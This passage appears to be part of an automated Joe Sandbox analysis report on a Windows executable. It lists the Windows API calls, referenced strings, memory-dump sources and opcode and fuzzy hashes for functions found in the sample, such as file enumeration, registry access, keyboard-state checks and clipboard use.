                                                          • SetForegroundWindow.USER32(?), ref: 0039D721
                                                          • AttachThreadInput.USER32(?,?,00000000), ref: 0039D748
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 4125248594-2988720461
                                                          • Opcode ID: 6ced1565e6ff74db442f456c59312e3eaeda79f8dbd524657ed40626fd2a3d9b
                                                          • Instruction ID: 642f822bd2240e4c38d888727cb78c8fe6e8e9668414d566be5a52567aacc48b
                                                          • Opcode Fuzzy Hash: 6ced1565e6ff74db442f456c59312e3eaeda79f8dbd524657ed40626fd2a3d9b
                                                          • Instruction Fuzzy Hash: 91317271A40358BFEF326FA19C8AF7F7E6CEB44B50F114125FA04EA1D1C6B15940AAA0
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003CC78D
                                                          • FindClose.KERNEL32(00000000), ref: 003CC7E1
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003CC806
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003CC81D
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 003CC844
                                                          • __swprintf.LIBCMT ref: 003CC890
                                                          • __swprintf.LIBCMT ref: 003CC8D3
                                                            • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                          • __swprintf.LIBCMT ref: 003CC927
                                                            • Part of subcall function 00383698: __woutput_l.LIBCMT ref: 003836F1
                                                          • __swprintf.LIBCMT ref: 003CC975
                                                            • Part of subcall function 00383698: __flsbuf.LIBCMT ref: 00383713
                                                            • Part of subcall function 00383698: __flsbuf.LIBCMT ref: 0038372B
                                                          • __swprintf.LIBCMT ref: 003CC9C4
                                                          • __swprintf.LIBCMT ref: 003CCA13
                                                          • __swprintf.LIBCMT ref: 003CCA62
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                          • API String ID: 3953360268-2428617273
                                                          • Opcode ID: 6908b36f0e5886e14179796ef52bb8cdbc2cad817d85b455c86a04d4b348bfaa
                                                          • Instruction ID: e16c48491cee95dcb14b8ecef6b17fffa87df88b2bc20cacf8227015758be932
                                                          • Opcode Fuzzy Hash: 6908b36f0e5886e14179796ef52bb8cdbc2cad817d85b455c86a04d4b348bfaa
                                                          • Instruction Fuzzy Hash: C2A11EB1414344ABC712EF94C885EAFB7ECAF99704F40492EF595CB191EB35DA08CB62
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 003CEFB6
                                                          • _wcscmp.LIBCMT ref: 003CEFCB
                                                          • _wcscmp.LIBCMT ref: 003CEFE2
                                                          • GetFileAttributesW.KERNEL32(?), ref: 003CEFF4
                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 003CF00E
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 003CF026
                                                          • FindClose.KERNEL32(00000000), ref: 003CF031
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 003CF04D
                                                          • _wcscmp.LIBCMT ref: 003CF074
                                                          • _wcscmp.LIBCMT ref: 003CF08B
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003CF09D
                                                          • SetCurrentDirectoryW.KERNEL32(00418920), ref: 003CF0BB
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003CF0C5
                                                          • FindClose.KERNEL32(00000000), ref: 003CF0D2
                                                          • FindClose.KERNEL32(00000000), ref: 003CF0E4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                          • String ID: *.*
                                                          • API String ID: 1803514871-438819550
                                                          • Opcode ID: 57415eefaeaac96489a502d0ae17417fdfe58230a91f53d05506b9ea07ff7a58
                                                          • Instruction ID: 62c06bf3e2beeefdd051011c2849bdfdc9a893b09839c69d217e6add4f1f6cd8
                                                          • Opcode Fuzzy Hash: 57415eefaeaac96489a502d0ae17417fdfe58230a91f53d05506b9ea07ff7a58
                                                          • Instruction Fuzzy Hash: DF3105365002686FCB26ABA0DC88FEE77AD9F45720F1042BAE800D6091DB70DE80CB55
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: -es$0D@$0E@$0F@$3c7$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG@$_7
                                                          • API String ID: 0-239065333
                                                          • Opcode ID: c00b662749c4e886d738acb2feb1e2ff37ac35f36d51340f0ae70f3b008561c6
                                                          • Instruction ID: 3c8ce6f38daeacb16a2c5e56dacd14d8b56b597aa3c79f7cc123968890f5d65e
                                                          • Opcode Fuzzy Hash: c00b662749c4e886d738acb2feb1e2ff37ac35f36d51340f0ae70f3b008561c6
                                                          • Instruction Fuzzy Hash: 6672AD71E006198BDB26CF59C8A17EEB7F5FF44314F54816AE909EB680E7349E81CB90
                                                          APIs
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E0953
                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,003EF910,00000000,?,00000000,?,?), ref: 003E09C1
                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003E0A09
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003E0A92
                                                          • RegCloseKey.ADVAPI32(?), ref: 003E0DB2
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 003E0DBF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectCreateRegistryValue
                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                          • API String ID: 536824911-966354055
                                                          • Opcode ID: 08ef1afbe6e71a2dcb3bb76499cc221095104567aaefaf252b72925ec45eb514
                                                          • Instruction ID: e2b8aa4084c12192a0151a2575a702e3e0af799f96e291798a7cf136fd89a66c
                                                          • Opcode Fuzzy Hash: 08ef1afbe6e71a2dcb3bb76499cc221095104567aaefaf252b72925ec45eb514
                                                          • Instruction Fuzzy Hash: 83026B756006519FCB16EF25C881E2AB7E9FF89324F05855DF8999B3A2CB70EC41CB81
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 003CF113
                                                          • _wcscmp.LIBCMT ref: 003CF128
                                                          • _wcscmp.LIBCMT ref: 003CF13F
                                                            • Part of subcall function 003C4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003C43A0
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 003CF16E
                                                          • FindClose.KERNEL32(00000000), ref: 003CF179
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 003CF195
                                                          • _wcscmp.LIBCMT ref: 003CF1BC
                                                          • _wcscmp.LIBCMT ref: 003CF1D3
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003CF1E5
                                                          • SetCurrentDirectoryW.KERNEL32(00418920), ref: 003CF203
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003CF20D
                                                          • FindClose.KERNEL32(00000000), ref: 003CF21A
                                                          • FindClose.KERNEL32(00000000), ref: 003CF22C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                          • String ID: *.*
                                                          • API String ID: 1824444939-438819550
                                                          • Opcode ID: e6c16b656fb82e5c0e8a5cdb2335e13af44fbe37b8e2c8016ec0c8aaf1b2e358
                                                          • Instruction ID: 7000f4e104f9e9c6c7ce85e7f4f7c0bc7919bfd83d3326c331a01eb0e498d7be
                                                          • Opcode Fuzzy Hash: e6c16b656fb82e5c0e8a5cdb2335e13af44fbe37b8e2c8016ec0c8aaf1b2e358
                                                          • Instruction Fuzzy Hash: AF31073A5002596FCB22AB60EC58FEE77AE9F45320F1506B9E800E61D0DB70DF45CB54
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003CA20F
                                                          • __swprintf.LIBCMT ref: 003CA231
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 003CA26E
                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003CA293
                                                          • _memset.LIBCMT ref: 003CA2B2
                                                          • _wcsncpy.LIBCMT ref: 003CA2EE
                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 003CA323
                                                          • CloseHandle.KERNEL32(00000000), ref: 003CA32E
                                                          • RemoveDirectoryW.KERNEL32(?), ref: 003CA337
                                                          • CloseHandle.KERNEL32(00000000), ref: 003CA341
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                          • String ID: :$\$\??\%s
                                                          • API String ID: 2733774712-3457252023
                                                          • Opcode ID: 9872d13a44a7b9782f8e673d55af4653718a6ed713b08fab56f19027709ac3af
                                                          • Instruction ID: ba1c5b4f21d56e6aa00b59bdf367cacd3d1b1439e6c6483b1a82b48e7abc9f9e
                                                          • Opcode Fuzzy Hash: 9872d13a44a7b9782f8e673d55af4653718a6ed713b08fab56f19027709ac3af
                                                          • Instruction Fuzzy Hash: B831C87590425DABDB22DFA0DC85FEB77BCEF88744F1041BAF508D6190E7709A448B25
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 003C0097
                                                          • SetKeyboardState.USER32(?), ref: 003C0102
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 003C0122
                                                          • GetKeyState.USER32(000000A0), ref: 003C0139
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 003C0168
                                                          • GetKeyState.USER32(000000A1), ref: 003C0179
                                                          • GetAsyncKeyState.USER32(00000011), ref: 003C01A5
                                                          • GetKeyState.USER32(00000011), ref: 003C01B3
                                                          • GetAsyncKeyState.USER32(00000012), ref: 003C01DC
                                                          • GetKeyState.USER32(00000012), ref: 003C01EA
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 003C0213
                                                          • GetKeyState.USER32(0000005B), ref: 003C0221
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: 68d5755d5ad7b66de526a843ebbf08dd7a9bd275fb003ca6cacb2783cdd3fc1b
                                                          • Instruction ID: b71b0a55b0dc8c633f166851dc64926a6d3f31064f5bcdad924b2fbee38c6101
                                                          • Opcode Fuzzy Hash: 68d5755d5ad7b66de526a843ebbf08dd7a9bd275fb003ca6cacb2783cdd3fc1b
                                                          • Instruction Fuzzy Hash: 7F51DB249047D899FB3BDBA08854FAABFB49F01380F09459E95C19A5C3DAA49F8CC761
                                                          APIs
                                                            • Part of subcall function 003E0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003DFDAD,?,?), ref: 003E0E31
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E04AC
                                                            • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                            • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003E054B
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003E05E3
                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003E0822
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 003E082F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1240663315-0
                                                          • Opcode ID: e8d09048ab116e73aa3339ce169a06a52e0b50d5130b307db965b21a59102db9
                                                          • Instruction ID: 828a36e16fb88f0a58a21f0a51bc54ec917977a3d4a679e1a1f6e4cfea3dd248
                                                          • Opcode Fuzzy Hash: e8d09048ab116e73aa3339ce169a06a52e0b50d5130b307db965b21a59102db9
                                                          • Instruction Fuzzy Hash: 46E16D71604250AFCB16DF25C891E2ABBE8FF89314F04C56DF84ADB2A2D670ED45CB91
                                                          APIs
                                                            • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                            • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                          • CoInitialize.OLE32 ref: 003D8403
                                                          • CoUninitialize.OLE32 ref: 003D840E
                                                          • CoCreateInstance.OLE32(?,00000000,00000017,003F2BEC,?), ref: 003D846E
                                                          • IIDFromString.OLE32(?,?), ref: 003D84E1
                                                          • VariantInit.OLEAUT32(?), ref: 003D857B
                                                          • VariantClear.OLEAUT32(?), ref: 003D85DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                          • API String ID: 834269672-1287834457
                                                          • Opcode ID: 9c9b1c01fd4972a6a64d7e92a9164071bf2f66634f0b09158ed5372fc1b84b85
                                                          • Instruction ID: 6e24c6e979911c987482c2ea11a81094000eb65b6c591bddd86a6add62ab9566
                                                          • Opcode Fuzzy Hash: 9c9b1c01fd4972a6a64d7e92a9164071bf2f66634f0b09158ed5372fc1b84b85
                                                          • Instruction Fuzzy Hash: 9C61BF726083129FC712DF55E888F6AB7E9AF49714F00451EF9819B391CB70ED44CB92
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                          • String ID:
                                                          • API String ID: 1737998785-0
                                                          • Opcode ID: da733c82408ff578dafe1c13f336b1af5d76369d3b93f2395acf6021ac6dc786
                                                          • Instruction ID: 4088fff98d02be1f3041d5c9050f016c83f5a3fbdc3d15d0c00f66168e5dc555
                                                          • Opcode Fuzzy Hash: da733c82408ff578dafe1c13f336b1af5d76369d3b93f2395acf6021ac6dc786
                                                          • Instruction Fuzzy Hash: 8D219C76600210DFDB22AF64EC49B6A7BACEF55710F10852AF946DF2A1DB70AD01CB54
                                                          APIs
                                                            • Part of subcall function 00364750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00364743,?,?,003637AE,?), ref: 00364770
                                                            • Part of subcall function 003C4A31: GetFileAttributesW.KERNEL32(?,003C370B), ref: 003C4A32
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003C38A3
                                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 003C394B
                                                          • MoveFileW.KERNEL32(?,?), ref: 003C395E
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 003C397B
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003C399D
                                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 003C39B9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 4002782344-1173974218
                                                          • Opcode ID: 8940847b610143af1ba85bb53ddfc5e8feced7696f664b6524489a18365fd69f
                                                          • Instruction ID: e3daee18caa00cf050d1abb0e9299bb95ab89c6a1c6f994598ff05b19aa1b007
                                                          • Opcode Fuzzy Hash: 8940847b610143af1ba85bb53ddfc5e8feced7696f664b6524489a18365fd69f
                                                          • Instruction Fuzzy Hash: 9851AF3180414CAACF17EBA0D992EEDB778AF11304F60816DE402BB195EF706F09CB61
                                                          APIs
                                                            • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 003CF440
                                                          • Sleep.KERNEL32(0000000A), ref: 003CF470
                                                          • _wcscmp.LIBCMT ref: 003CF484
                                                          • _wcscmp.LIBCMT ref: 003CF49F
                                                          • FindNextFileW.KERNEL32(?,?), ref: 003CF53D
                                                          • FindClose.KERNEL32(00000000), ref: 003CF553
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                          • String ID: *.*
                                                          • API String ID: 713712311-438819550
                                                          • Opcode ID: 83d50e86f1d64c051208fb3343a0abbfbf1e1dd0665e6210c3f743d2972c8f9d
                                                          • Instruction ID: 388de0495d87e7e9b1ff12d022555345d6957dc027297568e53c15a5af3a34dd
                                                          • Opcode Fuzzy Hash: 83d50e86f1d64c051208fb3343a0abbfbf1e1dd0665e6210c3f743d2972c8f9d
                                                          • Instruction Fuzzy Hash: 26417B7180021AAFCF16EF64CC45BEEBBB9FF05310F20456AE915A6190DB309E84CB50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: __itow__swprintf
                                                          • String ID: 3c7$_7
                                                          • API String ID: 674341424-4188345352
                                                          • Opcode ID: f333d9b06a81df03de374156e3d58d92094a66f0205518174126f6edddf0c3c7
                                                          • Instruction ID: 4396b301f9ebcb378ce8d23b85c0be8ce73baa1e8d0e06f3d8945e85b43cdab7
                                                          • Opcode Fuzzy Hash: f333d9b06a81df03de374156e3d58d92094a66f0205518174126f6edddf0c3c7
                                                          • Instruction Fuzzy Hash: F022AF716083009FD726DF24C881BAFB7E8EF85714F04891DF59A9B291DB75E904CB92
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
